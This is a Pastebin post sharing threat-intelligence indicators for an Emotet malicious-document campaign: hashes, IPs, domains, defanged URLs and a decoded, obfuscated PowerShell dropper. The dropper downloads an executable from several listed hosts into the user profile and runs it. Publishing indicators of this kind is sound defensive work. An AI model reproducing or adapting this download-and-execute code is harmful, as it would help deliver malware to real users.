Advertisement
paladin316

Emotet_Doc_out_2019-10-21_13_52.txt

Oct 21st, 2019
1,632
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.33 KB | None | 0 0
  1. #Emotet #Docs #malware #OSINT #IOC
  2.  
  3. MD5:
  4. 2b87d6a20674b8522d0cca2c97c42caf
  5. 2b87d6a20674b8522d0cca2c97c42caf
  6.  
  7.  
  8. IPs:
  9. 101.227.64.237
  10. 142.4.50.75
  11. 35.184.134.213
  12. 63.250.34.68
  13.  
  14.  
  15. Domains:
  16. aijdjy.com
  17. obbydeemusic.com
  18. veeplan.com
  19. www.kmacobd.com
  20. xsnonline.us
  21.  
  22.  
  23. URLs:
  24. hxxps://www.microsoft.com/ #> $bb147x080c2=
  25. hxxp://xsnonline.us/blogs/4x466v/
  26. hxxp://obbydeemusic.com/aqoeivj4fd/us5htvn/
  27. hxxp://veeplan.com/wp-content/dW0o3RoJNG/
  28. hxxp://www.kmacobd.com/u9r/
  29. hxxp://aijdjy.com/dup-installer/t0/
  30.  
  31.  
  32. Decoded Base64 Powershell:
  33. <# hxxps://www.microsoft.com/ #> $bb147x080c2='x2730503cb06';
  34. $b5x0c4c6b3488 = '856';
  35. $cb05c6510c007='c018309x0c2';
  36. $xc0x57b38b2x7=$env:userprofile+'\'+$b5x0c4c6b3488+'.exe';
  37. $x3094x09c0b0='cc082602x31';
  38. $xc2c295x20802=.('n'+'ew-obje'+'ct') NeT.wEBCLiENT;
  39. $b00b1371081='hxxp://xsnonline.us/blogs/4x466v/
  40. hxxp://obbydeemusic.com/aqoeivj4fd/us5htvn/
  41. hxxp://veeplan.com/wp-content/dW0o3RoJNG/
  42. hxxp://www.kmacobd.com/u9r/
  43. hxxp://aijdjy.com/dup-installer/t0/'."spL`iT"('
  44. ');
  45. $cxc2000153b='c78xb8790006';
  46. foreach($bc16801430cx in $b00b1371081){try{$xc2c295x20802."DowNL`OAdfi`Le"($bc16801430cx, $xc0x57b38b2x7);
  47. $b9366b008x6='c0300c98270';
  48. If ((.('Get-I'+'t'+'em') $xc0x57b38b2x7)."l`engTh" -ge 24516) {[Diagnostics.Process]::"s`TarT"($xc0x57b38b2x7);
  49. $bxc100525c074='c7604007xx328';
  50. break;
  51. $b2037060949='xx20b93043c0'}}catch{}}$xc56003958xx='c059234006c0'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement